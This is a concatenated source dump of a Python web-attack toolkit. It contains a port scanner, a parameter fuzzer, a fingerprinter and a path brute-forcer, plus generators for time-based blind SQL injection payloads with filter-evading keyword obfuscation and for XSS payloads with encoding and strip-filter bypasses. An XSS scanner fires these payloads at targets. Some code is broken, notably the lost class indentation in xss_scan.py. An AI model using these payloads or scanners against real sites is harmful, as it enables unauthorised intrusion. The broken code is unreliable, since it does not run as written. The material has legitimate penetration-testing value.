            'Cache-Control': 'max-age=0',
        }
        # Parameter name taken from the query string; the literal name
        # 'fuzz' switches to parameter-name fuzzing mode.
        self.param = url.split('?')[1].split('=')[0]
        self._print = _print()
        # A hit must land strictly inside (low_ratio, high_ratio), or be 0.
        self.high_ratio = 0.70
        self.low_ratio = 0.02
    def str_in_queue(self):
        """(Re)fill queue1 with candidate values from the wordlist."""
        with open('directroy/pathtotest_huge.txt','rb') as f:
            while True:
                string = f.readline().decode('utf-8').strip()
                if string:
                    self.queue1.put_nowait(string)
                else:
                    # NOTE(review): a blank line stops loading — the rest of
                    # the wordlist is skipped; confirm this is intended.
                    break
        self.length1 = self.queue1.qsize()
    def get_param(self):
        """Load candidate parameter names into self.list."""
        with open('directroy/123.txt','r') as f1:
            while True:
                param = f1.readline().strip()
                if param:
                    self.list.append(param)
                else:
                    break
        self.length2 = len(self.list)
    def origin_md5(self):
        """Cache an MD5 of the baseline page (currently never called)."""
        text = requests.get(self.url,headers = self.headers).text
        m = hashlib.md5()
        m.update(bytes(text,encoding = 'utf-8'))
        self.hex = m.hexdigest()
    def get_ratio(self,res_text):
        """Similarity (0..1) between the baseline page and *res_text*.

        Re-fetches the baseline on every call — one extra request per
        candidate.
        """
        seqm = SequenceMatcher()
        text = requests.get(self.url,headers = self.headers).text
        seqm.set_seq1(text)
        seqm.set_seq2(res_text)
        return seqm.ratio()
    async def fuzz(self,param):
        """Worker: try queued values for *param* until queue1 is empty."""
        session = ClientSession()
        while True:
            if not self.queue1.empty():
                string = await self.queue1.get()
                url = self.url + '?' + str(param) + '=' + str(string)
                try:
                    text = await self.get_response(url,session)
                    ratio = self.get_ratio(text)
                    # A hit is "different from baseline but not noise".
                    if ratio > self.low_ratio and ratio < self.high_ratio:
                        self._print.fuzz_res(param,string)
                    if ratio == 0:
                        self._print.fuzz_res(param,string)
                except:
                    # Best effort: any request failure skips the candidate.
                    pass
            else:
                await session.close()
                break
    async def get_response(self,url,session):
        """GET *url* and return the body text."""
        s = await session.get(url,headers = self.headers)
        return await s.text()
    def make_cor(self):
        """Spawn self.num workers; in name-fuzzing mode refill the value
        queue after each parameter's sweep."""
        if self.length2 == 1:
            self.tasks = [self.fuzz(self.param) for i in range(self.num)]
            self.loop.run_until_complete(asyncio.wait(self.tasks))
        else:
            for param in self.list:
                self.tasks = [self.fuzz(param) for i in range(self.num)]
                self.loop.run_until_complete(asyncio.wait(self.tasks))
                self.str_in_queue()
    def start(self):
        """Entry point: prepare wordlists, run the fuzz, print timing."""
        self._print.print_info("Start fuzz : %s" % time.strftime("%H:%M:%S"))
        time0 = time.time()
        if self.param == 'fuzz':
            self.get_param()
            self.str_in_queue()
        else:
            self.str_in_queue()
            self.length2 = 1
        self.make_cor()
        time2 = time.time() - time0
        self._print.port_end(time2)
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,657 | PanDa1G1/sunsecScanner | refs/heads/master | /src/test.py | # -*- coding: UTF-8 -*-
import sqlite3
from urllib import parse
import requests
from bs4 import BeautifulSoup
from _print import _print
import os
import time
import re
class FingerScan(set):
    """Web fingerprint scanner driven by an SQLite rule database.

    Fetches the target page once, then evaluates every fofa-style rule
    (header/body/title substring terms combined with || and &&) and
    prints each product the page matches.
    NOTE(review): inheriting from ``set`` appears accidental — the class
    never uses set behaviour; confirm before removing.
    """
    def __init__(self,url,db):
        self._print = _print()
        self.url = url
        self.headers = {'UserAgent':'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))'}
        self.db = db
        # Resolve the rule database relative to this file's directory.
        self.path = os.path.dirname(os.path.abspath(__file__))
        self.db_path = os.path.join(self.path,self.db)
        # zz: pulls the quoted literal out of a rule term, e.g. body="x".
        self.zz = '\"(.*)\"'
        # zz_2: detects a parenthesised && group inside an || expression.
        self.zz_2 = '\(.*&&.*\)'
    def make_url(self):
        """Normalise self.url in place: add http:// and a trailing slash."""
        parts = parse.urlparse(self.url)
        scheme = parts[0]
        if scheme == '':
            self.url = 'http://' + self.url
        if self.url[-1:] != '/':
            self.url += '/'
    def get_message(self):
        """Fetch the target page; return (body, headers, title).

        Returns None implicitly when the request fails — run() relies on
        the resulting unpacking TypeError being caught by its except.
        """
        try:
            self.make_url()
            res = requests.get(self.url,headers = self.headers,timeout=3)
            content = res.text
            headers = res.headers
            soup = BeautifulSoup(content, 'lxml')
            if soup.title:
                title = soup.title.string.strip()
                return content,headers,title
            else:
                title = 'none'
                return content,headers,title
        except Exception as e:
            pass
    def get_count(self):
        """Return the number of rules in the `fofa` table."""
        with sqlite3.connect(self.db_path) as conn:
            cur = conn.cursor()
            count = cur.execute('SELECT COUNT(id) FROM `fofa`')
            for i in count:
                return i[0]
    def get_dic(self,id_):
        """Return (product_name, rule_expression) for one rule id.

        id_ is an internally generated integer, so the format-built SQL
        is not attacker-controlled here; parameterise anyway if ids ever
        come from outside.
        """
        with sqlite3.connect(self.db_path) as conn:
            cur = conn.cursor()
            result = cur.execute("SELECT name,keys FROM `fofa` where id = '{}'".format(id_))
            for row in result:
                return row[0],row[1]
    def check_rule(self,issue,content,header,title):
        """Evaluate one atomic rule term against the fetched page.

        The term targets headers, body or title depending on its prefix;
        anything unrecognised falls back to a header check. Returns True
        on a case-insensitive substring match, None otherwise.
        """
        if "header" in issue:
            str_ = re.search(self.zz,issue).group(1).lower()
            if str_ in str(header).lower():
                return True
        elif 'body' in issue:
            str_ = re.search(self.zz,issue).group(1).lower()
            if str_ in str(content).lower():
                return True
        elif 'title' in issue:
            str_ = re.search(self.zz,issue).group(1).lower()
            if str_ in str(title).lower():
                return True
        else:
            str_ = re.search(self.zz,issue).group(1).lower()
            if str_ in str(header).lower():
                return True
    def check(self,id_,count,content,header,title):
        """Evaluate rule *id_* (supporting ||, && and one level of
        parentheses) and print the product name on a match."""
        name,keys = self.get_dic(id_)
        self._print.print_process((id_ / count)*100,id_)
        # Pure || expression: any single matching term is enough.
        if '||' in keys and '&&' not in keys and '(' not in keys and ')' not in keys:
            for issue in keys.split('||'):
                if self.check_rule(issue,content,header,title):
                    self._print.check_sess(self.url,name)
                    break
        # Single term, no operators.
        elif '||' not in keys and '&&' not in keys and '(' not in keys and ')' not in keys:
            if self.check_rule(keys,content,header,title):
                self._print.check_sess(self.url,name)
        # Pure && expression: every term must match.
        elif '&&' in keys and '||' not in keys and '(' not in keys and ')' not in keys:
            cal = 0
            for issue in keys.split('&&'):
                if self.check_rule(issue,content,header,title):
                    cal += 1
            if cal == len(keys.split('&&')):
                self._print.check_sess(self.url,name)
        else:
            if re.search(self.zz_2,keys):
                # Shape: a || b || (c && d)
                for issue in keys.split('||'):
                    if '&&' not in issue:
                        if self.check_rule(issue,content,header,title):
                            self._print.check_sess(self.url,name)
                            break
                    else:
                        num = 0
                        issue = issue.replace('(','').replace(')','').strip()
                        for i in issue.split('&&'):
                            if self.check_rule(i,content,header,title):
                                num += 1
                        if num == len(issue.split('&&')):
                            self._print.check_sess(self.url,name)
            else:
                # Shape: a && b && (c || d)
                num = 0
                for issue in keys.split('&&'):
                    if '||' not in issue:
                        if self.check_rule(issue,content,header,title):
                            num += 1
                    else:
                        issue = issue.replace('(','').replace(')','').strip()
                        for i in issue.split('||'):
                            if self.check_rule(i,content,header,title):
                                num += 1
                                break
                if num == len(keys.split('&&')):
                    self._print.check_sess(self.url,name)
    def run(self):
        """Fetch the page once and evaluate every rule against it."""
        try:
            self._print.print_info("Start: %s" % time.strftime("%H:%M:%S"))
            count = self.get_count()
            content,header,title = self.get_message()
            for i in range(1,count + 1):
                self.check(i,count,content,header,title)
        except Exception as e:
            print(e)
if __name__ == "__main__":
    # Manual smoke test against localhost; runs only when executed directly.
    a = FingerScan('127.0.0.1','web.db')
    # NOTE(review): make_url() mutates self.url and returns None, so this
    # prints "None" — probably meant print(a.url) after the call.
    print(a.make_url())
    a.run()
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,658 | PanDa1G1/sunsecScanner | refs/heads/master | /src/port_scan.py | import nmap
import queue
import threading
from src._print import _print
import socket
import time
class myThread():
    """Multi-threaded TCP port scanner with optional banner grabbing.

    *port* accepts a single port ("80"), a comma list ("80,443") or a
    range ("1-1024"). Range scans report only open ports (with service
    name and banner); explicit ports report both open and closed.
    """
    def __init__(self, host, port, thread_num=100):
        self.host = host
        self._print = _print()
        self.port = port
        self.q = queue.Queue()
        self.timeout = 0.1   # per-connection timeout in seconds
        self.threads = [threading.Thread(target=self.thread_work) for i in range(thread_num)]
        self.thread_num = thread_num
        # True when scanning a port range (switches the output style).
        self.flag = False

    def in_queue(self):
        """Expand self.port into individual port numbers on the queue."""
        if '-' in self.port:
            lport, hport = (int(p) for p in self.port.split('-'))
            for i in range(lport, hport + 1):
                self.q.put(i)
            self.flag = True
        elif ',' in self.port:
            for port in self.port.split(','):
                self.q.put(int(port))
        else:
            self.q.put(int(self.port))

    def out_queue(self):
        """Pop the next port number to probe."""
        return self.q.get()

    def thread_work(self):
        """Worker: pop ports and attempt a TCP connect on each."""
        while not self.q.empty():
            port = self.out_queue()
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(self.timeout)
            res = s.connect_ex((self.host, port))
            s.close()
            if self.flag:
                if res == 0:
                    try:
                        service = socket.getservbyport(port)
                    except OSError:
                        service = 'unknown'
                    self._print.port_res(port, 'open', service)
                    try:
                        # BUG FIX: the original called self.bannergrabber but
                        # defined bannergrabbing(addr, port) without self, so
                        # every open port just printed 'fail'.
                        self.bannergrabber(self.host, port)
                    except Exception:
                        print('fail')
                    continue
            else:
                if res == 0:
                    self._print.port_sess(port, 'open')
                else:
                    self._print.port_fail(port, 'close')

    def bannergrabber(self, addr, port):
        """Connect, poke the service and print whatever banner it sends."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Was socket.setdefaulttimeout(2): scope the timeout to this socket
        # instead of mutating the process-wide default.
        sock.settimeout(2)
        sock.connect((addr, port))
        # BUG FIX: sockets require bytes; the original sent a str, which
        # raises TypeError on Python 3.
        sock.send(b'WhoAreYou\r\n')
        banner = sock.recv(100)
        sock.close()
        print(banner, "\n")

    def scan_start(self):
        """Run all worker threads and print the elapsed time."""
        self._print.print_info("Start scan port : %s" % time.strftime("%H:%M:%S"))
        time0 = time.time()
        for i in self.threads:
            i.start()
        for i in self.threads:
            i.join()
        time2 = time.time() - time0
        self._print.port_end(time2)
if __name__ == "__main__":
    # Manual full-range scan of a LAN host; runs only when executed directly.
    a = myThread('192.168.8.150','1-65535')
    a.in_queue()
    a.scan_start()
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,659 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/make_dict/make_time_payload.py |
# Generator for the time-based blind SQLi payload wordlist.
# Combines quote/paren prefixes, comment/balancing suffixes and keyword
# obfuscations, appending every variant to ../payload/time.txt.
# Mode "a+" means reruns keep appending (duplicates included).
# NOTE(review): a contains two entries keyed "suBstr" — only the first is
# ever hit by str.replace per pass; confirm the second is intentional.
a = [("and","AnaNdd"),("suBstr","Mid"),("select","SELSEleCtect"),("aScii","aSciaSciii"),("suBstr","subSuBstrstr")]
pre_ = ["' ",'" ',"') "," ","')) ",")' ","))' ",'") ','")) ',')" ','))" ']
stuff_ = ["#","-- ","and('1')='1","and('1')=\"1","and('1')=('1","and('1')=(\"1","and('1')=(('1","and('1')=((\"1","and('1')='(1","and('1')='((1","and('1')=\"((1","and('1')=\"(1"]
# payload1 sleeps when the probed character equals 54; payload2 is the
# negated form of the same test.
payload1 = "and(sleep(if((select(aScii(suBstr('867546938',2,1)))=54),[wait_time],1)))"
payload2 = "and(sleep(if(!(select(aScii(suBstr('867546938',2,1))<>54)),[wait_time],1)))"
with open("../payload/time.txt","a+") as f:
    for pre in pre_:
        for stuff in stuff_:
            # Base payloads without obfuscation.
            f.write('1' + pre+payload1+stuff+ "\n")
            f.write('1' + pre+payload2+stuff + "\n")
            #1  single-keyword substitutions
            # NOTE(review): this loop iterates j but never uses it, so each
            # single-substitution variant is written len(a)-i-1 times —
            # looks like a copy-paste slip; output preserved as-is.
            for i in range(len(a)):
                for j in range(i + 1,len(a)):
                    f.write(('1' + pre+payload1+stuff).replace(a[i][0],a[i][1]) + "\n")
                    f.write(('1' + pre+payload2+stuff).replace(a[i][0],a[i][1]) + "\n")
            #2  every pair of substitutions
            for i in range(len(a)):
                for j in range(i + 1,len(a)):
                    f.write(('1' + pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]) + "\n")
                    f.write(('1' + pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]) + "\n")
            #3  every triple of substitutions
            for i in range(len(a)):
                for j in range(i+1,len(a)):
                    for k in range(j+1,len(a)):
                        f.write(('1' + pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]) + "\n")
                        f.write(('1' + pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]) + "\n")
            #4  every quadruple of substitutions
            for i in range(len(a)):
                for j in range(i+1,len(a)):
                    for k in range(j+1,len(a)):
                        for l in range(k+1,len(a)):
                            f.write(('1' + pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]) + "\n")
                            f.write(('1' + pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]) + "\n")
            #5  all five substitutions at once
            for i in range(len(a)):
                for j in range(i+1,len(a)):
                    for k in range(j+1,len(a)):
                        for l in range(k+1,len(a)):
                            for m in range(l+1,len(a)):
                                f.write(('1' + pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]) + "\n")
                                f.write(('1' + pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]) + "\n")
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,660 | PanDa1G1/sunsecScanner | refs/heads/master | /xss/xss_scan.py | # -*- coding: UTF-8 -*-
import requests
import re
import threading
import queue
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.common.alert import Alert
import time
from urllib.parse import quote
import sys
from colorama import Fore, Style, Back
from selenium.common.exceptions import NoAlertPresentException
from selenium.webdriver.common.action_chains import ActionChains
class xss_Scanner():
    def __init__(self,url,payload_num = 3,thread_num=50):
        """XSS scanner for *url*; '*' marks the injection point.

        payload_num / thread_num configure later payload-testing stages.
        """
        self.url = url
        self.headers = {
            'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
            'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
            'Accept-Encoding': 'identity',
            'Keep-Alive': '300',
            'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
        }
        self.payload_num=payload_num
        # Flags recording which injection contexts were confirmed.
        self.if_tags=0
        self.if_attribute=0
        self.if_dom=0
        self.if_click_dom = 0
        self.if_mouse_dom =0
        # Unique marker echoed back by the target when reflection works.
        self.tem_payload = "~88868666~"
        self.firefox_options=Options()
        self.firefox_options.headless = True
        self.queue_ = queue.Queue()
        self.thread_num = thread_num
        self.tem_payload_num=0
        self.dom_arr=[]
def judge_tag(self):
payload = "<test0>"+ self.tem_payload + "</test0>"
url = self.url.replace("*",payload)
result = requests.get(url,headers = self.headers).text
#print("[1]" + result)
m = re.search(r"(<.*>)*[^\"]<test0>.*</test0>",result)
if m:
tag = m.group(1)
if tag:
#print("[3]"+tag)
self.if_tags=1
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]tags can be injected\n")
return tag
else:
self.if_tags=1
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]tags can be injected\n")
return 0
else:
return 0
def judge_attribute(self):
payload =self.tem_payload + "\">"
url = self.url.replace("*",payload)
result = requests.get(url,headers = self.headers).text
#print("[2]" + result)
m = re.search(r"<[a-z]+ ([a-z]*)=\"~88868666~\">",result)
if m:
attribute = m.group(1)
#print("[4]"+attribute)
self.if_attribute=1
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]attribute can be injected\n")
return attribute
else:
return 0
def judge_dom(self):
url = self.url.replace("*",self.tem_payload)
browser = webdriver.Firefox(options=self.firefox_options)
browser.get(url)
result = browser.page_source
#print("[7]" + result)
if self.tem_payload in result and ("location.search" in result or "document.location.href" in result) and ("document.write" in result or "appendChild" in result or "innerHTML" in result):
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]dom can be injected\n")
self.if_dom=1
return 1
clickList = browser.find_elements_by_xpath("//*[@onclick]")
mouseList = browser.find_elements_by_xpath("//*[@onmousemove]")
if clickList:
for tag in clickList:
ActionChains(browser).move_to_element(tag).click(tag).perform()#模拟点击
result = browser.page_source
if self.tem_payload in result:
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]dom can be injected\n")
self.if_click_dom = 1
return 1
if mouseList:
for tag in mouseList:
ActionChains(browser).move_to_element(tag).perform()#模拟鼠标移动
result = browser.page_source
if self.tem_payload in result:
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]dom can be injected\n")
self.if_mouse_dom = 1
return 1
def payload_in_queue(self):
self.tag_pre = self.judge_tag();
self.pre_attribute = self.judge_attribute();
if_dom = self.judge_dom()
if(self.if_tags == 1):
tag_dict = "xss/tag_payload.txt"
with open(tag_dict,"r") as f:
for payload in f:
self.queue_.put(payload.split("\n")[0])
if(self.if_attribute == 1):
tag_dict = "xss/attr_payload.txt"
with open(tag_dict,"r") as f:
for payload in f:
self.queue_.put(payload.split("\n")[0])
if(self.if_dom == 1 or self.if_click_dom == 1 or self.if_mouse_dom == 1):
tag_dict = "xss/dom_dict.txt"
with open(tag_dict,"r") as f:
for payload in f:
self.queue_.put(payload.split("\n")[0])
def tag_scan(self):
while not self.queue_.empty():
payload = self.queue_.get()
payload_ = quote(payload,"utf-8")
if self.tag_pre == 0:
url = self.url.replace("*",payload_)
elif re.match(r"title|textarea|math|iframe|xmp|plaintext",self.tag_pre[1:len(self.tag_pre)-1]):#闭合特殊标签
payload = self.tag_pre[0] + "/" + self.tag_pre[1:] + payload
url = self.url.replace("*",payload_)
else:
url = self.url.replace("*",payload_)
browser = webdriver.Firefox(options=self.firefox_options)#options=self.firefox_options
try:
browser.get(url)
result = browser.switch_to.alert.text
if result == "668868":
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]available payload {}\n".format(payload))
self.tem_payload_num +=1
#browser.close()
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
else:
continue
except NoAlertPresentException as e:
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
continue
def attribute_scan(self):
while not self.queue_.empty():
payload_ = self.queue_.get()
#payload_ = quote(payload,"utf-8")
url = self.url.replace("*",payload_)
#print("[8] {}".format(url))
browser = webdriver.Firefox(options=self.firefox_options)
try:
browser.get(url)
result = browser.switch_to.alert.text
if result == "668868":
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]available payload {}\n".format(payload_))
self.tem_payload_num +=1
#browser.close()
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
else:
continue
except NoAlertPresentException as e:
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
continue
def dom_scan(self):
while not self.queue_.empty():
payload = self.queue_.get()
url = self.url.replace("*",payload)
browser = webdriver.Firefox(options=self.firefox_options)
try:
browser.get(url)
if self.if_click_dom:
tags = browser.find_elements_by_xpath("//*[@onclick]")
for tag in tags:
ActionChains(browser).move_to_element(tag).click(tag).perform()
result = browser.switch_to.alert.text
if result == "668868":
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]available payload {}\n".format(payload))
self.tem_payload_num +=1
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
elif self.if_mouse_dom:
tags = browser.find_elements_by_xpath("//*[@onmousemove]")
for tag in tags:
ActionChains(browser).move_to_element(tag).perform()
result = browser.switch_to.alert.text
if result == "668868":
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]available payload {}\n".format(payload))
self.tem_payload_num +=1
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
else:
result = browser.switch_to.alert.text
if result == "668868":
sys.stdout.write(Fore.LIGHTGREEN_EX +"[*]available payload {}\n".format(payload))
self.tem_payload_num +=1
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
else:
continue
except NoAlertPresentException as e:
if self.tem_payload_num == self.payload_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[~]scan finished\n")
browser.quit()
sys.exit(0)
continue
def run(self):
self.payload_in_queue()
#print("[5]%d" % self.if_attribute)
#print("[6]%d" % self.if_tags)
if self.if_attribute:
thread_ = []
for i in range(self.thread_num):
t = threading.Thread(target = self.attribute_scan())
thread_.append(t)
t.start()
for t in thread_:
t.join()
if self.if_tags:
thread_ = []
for i in range(self.thread_num):
t = threading.Thread(target = self.tag_scan())
thread_.append(t)
t.start()
for t in thread_:
t.join()
if self.if_dom or self.if_click_dom or self.if_mouse_dom:
thread_ = []
for i in range(self.thread_num):
t = threading.Thread(target = self.dom_scan())
thread_.append(t)
t.start()
for t in thread_:
t.join()
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,661 | PanDa1G1/sunsecScanner | refs/heads/master | /src/scan.py | import asyncio
import time
import aiohttp
from aiohttp import ClientSession
from urllib import parse
from src._print import _print
class path_scan(object):
    """Asynchronous path/directory brute-forcer built on aiohttp coroutines."""
    def __init__(self,url,max_num,dictory):
        """
        :param url: base URL to scan (scheme optional; ``http://`` is assumed)
        :param max_num: number of concurrent worker coroutines
        :param dictory: wordlist file with one relative path per line
        """
        self.url = url
        self.dictory = dictory
        self.count = 0  # number of paths requested so far (progress display)
        self.loop = asyncio.get_event_loop()
        self.tasks = []
        self.coroutine_num = int(max_num)
        self.queue = asyncio.Queue()
        self._print = _print()
        self.session = ClientSession(loop=self.loop)  # shared by all workers
        self.headers = {
            'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
            'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
            'Accept-Encoding': 'identity',
            'Keep-Alive': '300',
            'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
        }
    def make_url(self,url):
        """Join relative path *url* onto the base URL.

        Normalises ``self.url`` in place on first use: prepends ``http://``
        when no scheme is present and guarantees a trailing slash.
        """
        parts = parse.urlparse(self.url)
        if parts[0] == '':
            self.url = 'http://' + self.url
        if self.url[-1:] != '/':
            self.url += '/'
        return str(self.url) + str(url)
    async def get_response(self,url,allow_redirects=True):
        """Issue a GET request through the shared session."""
        return await self.session.get(url,headers = self.headers,allow_redirects=allow_redirects)
    async def scan(self):
        """Worker coroutine: request queued paths until the queue is empty.

        Only 200 and 401 responses are reported; 301/302/403/404 are
        deliberately ignored.
        """
        while True:
            try:
                url = self.queue.get_nowait()
            except asyncio.QueueEmpty:
                # queue drained -- release the shared session and stop
                await self.session.close()
                break
            full_url = self.make_url(url)
            self.count += 1
            try:
                response = await self.get_response(full_url)
            except Exception:
                # BUGFIX: the original closed the shared session on the
                # first request error, silently killing every other worker.
                continue
            self._print.print_process((self.count / self.length) * 100, url)
            code = response.status
            if code == 200:
                self._print.print_succ(url)
            elif code == 401:
                self._print.print_401(url)
            # 404 / 403 / 301 / 302: intentionally not reported
    def make_cor(self):
        """Create the worker coroutines and run them to completion."""
        self.tasks = [self.scan() for _ in range(self.coroutine_num)]
        return self.loop.run_until_complete(asyncio.wait(self.tasks))
    def get_dir(self):
        """Load the wordlist into the queue and remember its size for the
        progress display.

        BUGFIX: the original stopped reading at the first blank line,
        truncating any wordlist that contains one; blank lines are now
        simply skipped.
        """
        with open(self.dictory,'r') as f:
            for line in f:
                url = line.strip()
                if url:
                    self.queue.put_nowait(url)
        self.length = self.queue.qsize()
    def start(self):
        """Entry point: announce the scan, load the wordlist and run it."""
        self._print.print_info("Start scan path : %s" % time.strftime("%H:%M:%S"))
        self.get_dir()
        self.make_cor()
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,662 | PanDa1G1/sunsecScanner | refs/heads/master | /xss/make_payload.py | # -*- coding: UTF-8 -*-
from urllib.parse import quote
class make_payload():
    """Generator for the XSS payload dictionaries used by the scanner.

    ``make_tag`` writes tag-context payloads to ``tag_payload.txt`` and
    ``make_attribute`` writes attribute-context payloads to
    ``attr_payload.txt``.  The canary in every payload is ``alert(668868)``.
    """
    def __init__(self):
        self.tag_file = "tag_payload.txt"
        self.attribute_file = "attr_payload.txt"
        self.payload = "alert(668868)"      # canary the scanner looks for
        self.protocal = "javascript:"
    def js_encode(self,sentence):
        """Return *sentence* as a JavaScript ``\\uXXXX`` escape sequence."""
        # zero-padded to 4 hex digits; identical output for ASCII input
        return "".join("\\u{:04x}".format(ord(char_)) for char_ in sentence)
    def html_encode(self,sentence):
        """Return *sentence* as HTML hex character references (``&#x..``)."""
        return "".join("&#x{:x}".format(ord(char_)) for char_ in sentence)
    def url_encode(self,sentence):
        """Return *sentence* percent-encoded, one ``%XX`` per character."""
        # BUGFIX: zero-pad to two hex digits (ords < 0x10 used to emit "%x")
        return "".join("%{:02x}".format(ord(char_)) for char_ in sentence)
    def make_tag(self):
        """Write tag-context payloads to ``tag_payload.txt``.

        Every base vector is emitted in several mutated forms: verbatim,
        space->``/``, parens->backticks, with the function name
        ``\\u``-escaped, and with the ``script`` keyword doubled to survive
        naive single-pass strip filters.
        """
        payload_arr = ["<script>*;</script>","<img src=\"1\" onerror=*>","<svg onload=*>","<iframe src=\"http://baidu.com\" onload=*></iframe>","<details open ontoggle=\"*\">","<select autofocus onfocus=*>"
        ,"<marquee onstart=*>","<audio src onloadstart=*","<video src=\"_\" onloadstart=\"*\">","<video><source onerror=\"javascript:*\">","<keygen autofocus onfocus=*>"]
        tem_payload = self.js_encode(self.payload[:5])  # \u-escaped "alert" (loop-invariant)
        with open(self.tag_file,"w") as f:
            for i in payload_arr:
                f.write(i.replace("*",self.payload)+"\n")
                f.write(i.replace("*",self.payload).replace(" ","/")+"\n")  # space -> /
                f.write(i.replace("*",self.payload).replace("(","`").replace(")","`")+"\n")  # () -> ``
                # unicode-escaped function name
                f.write(i.replace("*",tem_payload+"(668868)").replace(" ","/")+"\n")
                f.write(i.replace("*",tem_payload+"(668868)")+"\n")
